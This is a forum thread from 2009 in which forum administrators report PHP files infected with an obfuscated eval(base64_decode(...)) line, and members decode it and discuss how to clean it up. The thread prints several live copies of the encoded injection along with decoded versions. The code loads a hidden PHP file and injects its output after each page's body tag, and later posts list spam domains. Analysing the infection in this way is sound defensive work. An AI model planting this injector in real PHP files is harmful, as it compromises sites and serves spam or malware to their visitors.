News:

Join the Facebook Fan Page.

Main Menu

Is this a hack?

Started by Xavi-Nena, February 07, 2009, 10:16:55 PM

Previous topic - Next topic

Xavi-Nena

I have code at the top of some of my files im guessing is a hack?

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9hbnlwdXBjby9wdWJsaWNfaHRtbC9hLWNvcnNvdGFsay9iYi9UaGVtZXMvc2NyaWJibGVzMTEvaW1hZ2VzL2ltZy9pbWcvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2FueXB1cGNvL3B1YmxpY19odG1sL2EtY29yc290YWxrL2JiL1RoZW1lcy9zY3JpYmJsZXMxMS9pbWFnZXMvaW1nL2ltZy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Xavi-Nena

nevermind sorry i figured it out that it was.

MrMike

Yep, it decodes to this...and it contains more obfuscated strings. It's a hack.

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B& 8) {$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Xavi-Nena

any idea how to figure out how this is happening?

MrMike

It looks like they put the file "copper.php" on the site and are calling it through an include:

home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php

There's a lot off GZ-encoded stuff to further hide the programming statements. It could be almost anything, a malware dropper, an extra ad displayer, a backdoor, a botnot includer file, etc etc.

Xavi-Nena

ugh thanks...

lets hope it stops. considering i do not even have that file in my themes directory anymore...

MrMike

Quote from: NenaGb on February 08, 2009, 12:18:12 AM
ugh thanks...

lets hope it stops. considering i do not even have that file in my themes directory anymore...
More importantly, you want to find out how your site was compromised initially or it'll probably be exploited again. They may also have installed additional code on your site that you'll want to find.

If you're running on a linux box, this command will list the newest files anywhere on the system:  ls -a -l -t -R | more

Xavi-Nena

im not sure exactly if i am or not or how to run that code...would you mind explaining? thanks so much.

Fustrate

I got bored... doubt it'll be very helpful without the copper.php file, but here it is all cleaned up.

if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])){
$GLOBALS['sh_no'] = 1;

if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){
include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');

if(function_exists('gml') && !function_exists('dgobh')){
if(!function_exists('gzdecode')){
function gzdecode($var1){
$var2 = ord(substr($var1, 3, 1));
$var3 = 10;
$var4 = 0;

if($var2&4){
$var4 = unpack('v',substr($var1, 10, 2));
$var4 = $var4[1];
$var3 += 2 + $var4;
}

if($var2&8)
$var3 = strpos($var1, chr(0), $var3) + 1;

if($var2&16)
$var3 = strpos($var1, chr(0), $var3) + 1;

if($var2&2)
$var3 += 2;

$var5 = gzinflate(substr($var1, $var3));

if($var5 === FALSE)
$var5 = $var1;

return $var5;
}
}

function dgobh($var6){
Header('Content-Encoding: none');
$var7 = gzdecode($var6);
if(preg_match('/<body/si', $var7))
return preg_replace('/(<body[^>]*>)/si', '$1' . gml(), $var7);
else
return gml() . $var7;
}

ob_start('dgobh');
}
}
}
Steven Hoffman
Former Team Member, 2009-2012

Xavi-Nena

forgive my ignorance but what exactly is this cleaned up?  O:)

aldo

We would need to see copper.php in order to know what it does.

Fustrate

Well it's that big chunk of code from MrMike's post, with the really long variables replaced with $var1 - $var7, and put in a form that actually legible.

The only thing I can discern from it is that it adds whatever gml() does right after the <body> tag. Without copper.php, we don't know what gml() puts in there.
Steven Hoffman
Former Team Member, 2009-2012

Totosfo

Hi all,

I had the same issue - the code was added to ALL .php files on my server. If anyone is interested in the copper.php file, I can provide it, just let me know where to mail it.

Best,

Thomas
Cheers,

Thomas

Fustrate

Steven Hoffman
Former Team Member, 2009-2012

cafecommk

Can someone tell me how did you resolve this issue. i do not have a copper.php file but I have this :
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));
and it is in all my php files. even in settings_bak

I appologize for  writing in two posts http://www.simplemachines.org/community/index.php?topic=291664.msg1931245#msg1931245

thank you

Fustrate

#15
you'd probably have to remove it manually from every file, or use a large upgrade like [n3rve] said in the other thread.

And there was no file at /home/vistinac/public_html/cafe/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts/copper.php? I still haven't been able to find a copy of it to see what this does, but since you said it's not there, we still don't quite know what this does.
Steven Hoffman
Former Team Member, 2009-2012

cafecommk

sorry i did not find a copper.php . I removed all the files not needed and [n3rve] helped on the large upgrade and ....
I just hope it does not make me anymore trouble.

ccondrup

#17
I have recently had my Smf 1.1.8 board hacked. I have recently seen an increase in automatically registered accounts, and a couple of automated spam posts, so I have been monitoring a little closer lately. When suddenly lots of avatars went missing, I knew something was up.

All .php files under /www/ had this line injected at the top of the file:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS8zL2IvYm14L3d3dy9wbWEvcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvMy9iL2JteC93d3cvcG1hL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
No files with other file extensions were touched, and .php files outside of /www/ were also unharmed.

The above base64 hash decodes to what is in the attached decoded_injection.php
It in turn calls the main hack file, in my case called style.css.php - in my case this was placed in a subdirectory of an outdated phpmyadmin-install, quite possibly their point of entry for the exploit. I guess this file can be named copper.php or whatever in other circumstances.

This style.css.php file was a 170kb file with a huge base64 hash. It decoded to approx 20 new base64 encoded evals. I decoded everything I found and ran it through a code prettyfier, and ended up with a 100kb php file of approx 2000 lines of code. I did a search+replace for some of the function names, but quickly tired and stopped halfway through - the file is just so massive..

Also, if your site is infected, take note of which folder that last mentioned file is in, because in the same folder is where it stores the generated spam files this hack creates. They are files without extensions, names ranging from just "t", "50", to longer names such as "f2219f70f695539a82941423841dc26c". I have attached 3 examples of those final spam files this hack aims to generate.

You can search the style.css.php file for "http:" to quickly find the involved spam domains, which include:
   nomsat23.net nssat3.com wplsat23.net pearch.net gawab.com
After googling gawab.com and the other mentioned callback-urls, I found several domains common forum admins have had trouble with, so I am creating an sql file to add all these domains to my smf bantriggers. Its also attached as spamdomains.sql - remember to replace 15 with the id of the bangroup you want to add these to.

Hope this helps someone. If anyone cares to dig deeper into the code, please update the thread with whatever you find.

busterone

That looks really familiar.  Did you, or do you have a member named Krisbarteo?

If so, you may want to look at this thread-
http://www.simplemachines.org/community/index.php?topic=307717.msg2047539#msg2047539

ccondrup

Wouldn't you know it, I came directly to this thread via a search for the base64 hash in all the files. After I had posted, I looked at the other threads in the forum, so I found out how common this issue was ;)

I have already read the one you linked, and now all my bantriggers are removed and this mod has been installed. Yes, Krisbarteo was present, and a few other suspicious members from same host/ip. So far it has found ~10 registered members that are confirmed spammers. Already love the mod ;)

Advertisement: